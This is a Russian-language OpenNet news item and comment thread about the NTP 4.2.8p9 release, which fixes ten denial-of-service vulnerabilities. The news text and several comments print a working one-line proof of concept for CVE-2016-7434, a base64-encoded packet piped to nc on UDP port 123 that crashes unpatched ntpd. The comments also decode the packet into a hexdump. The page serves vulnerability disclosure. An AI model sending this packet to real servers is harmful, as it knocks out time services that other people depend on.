https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html Доступен (http://www.ntp.org/downloads.html) корректирующий выпуск сервера для синхронизации точного времени NTP 4.2.8p9, в котором устранено 10 уязвимостей (http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se), которые могут привести к отказу в обслуживании, путём исчерпания доступных ресурсов или инициирования краха процесса. Одна из уязвимостей (http://bugs.ntp.org/show_bug.cgi?id=3082) (CVE-2016-7434) достаточно проста в эксплуатации (http://dumpco.re/cve-2016-7434/) и может привести к краху процесса ntpd при отправке специально оформленного пакета без необходимости прохождения аутентификации (проблема проявляется на ранней стадии соединения):<br><br><br><br> echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"&#92;<br> "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" &#124; base64 -d &#124; nc -u -v 127.0.0.1 123<br><br><br><br><br><br>URL: http://www.kb.cert.org/vuls/id/633847<br>Новость: http://www.opennet.ru/opennews/art.shtml?num=45553<br> https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#9 Mon, 28 Nov 2016 08:37:59 GMT К сожалению ты неправ!<br>Крашится, но v4.2.8_p9 - нет.<br> https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#8 Sun, 27 Nov 2016 00:21:55 GMT &gt; При копировании команды имейте в виду, что на opennet ...<br><br>UNIX-way - printf<br> <br>[code]printf "%q" "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\<br> "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" &#124; base64 -d &#124; nc -u -v 127.0.0.1 123<br>[/code]<br> https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#7 Fri, 25 Nov 2016 09:40:30 GMT Gentoo, ntp 4.2.8p8 - не крашится<br> https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#6 Thu, 24 Nov 2016 19:35:51 GMT Потрясающе!<br> https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#5 Thu, 24 Nov 2016 13:37:04 GMT в этот раз на слаке апдейт завезли быстро<br> https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#4 Thu, 24 Nov 2016 10:59:04 GMT точно! тупанул.<br> https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#3 Thu, 24 Nov 2016 10:33:55 GMT wd ~ % echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" &#124;base64 -d &#124;hexdump -C<br>00000000 16 0a 00 10 00 00 00 00 00 00 00 36 6e 6f 6e 63 &#124;...........6nonc&#124;<br>00000010 65 2c 20 6c 61 64 64 72 3d 5b 5d 3a 48 72 61 67 &#124;e, laddr=[]:Hrag&#124;<br>00000020 73 3d 33 32 2c 20 6c 61 64 64 72 3d 5b 5d 3a 57 &#124;s=32, laddr=[]:W&#124;<br>00000030 4f 50 00 32 2c 20 6c 61 64 64 72 3d 5b 5d 3a 57 &#124;OP.2, laddr=[]:W&#124;<br>00000040 4f 50 00 00 &#124;OP..&#124;<br> https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#2 Thu, 24 Nov 2016 09:45:31 GMT echo "6nonce, laddr=[]:Hrags=32, laddr=[]:WOP2, laddr=[]:WOP"<br> https://ssl.opennet.dev/openforum/vsluhforumID3/109733.html#1 Thu, 24 Nov 2016 08:23:10 GMT При копировании команды имейте в виду, что на opennet отступы для блоков кода дополнительные ставятся, что приводит к появлению пробела посреди строки. ;)<br><br>echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA="<br>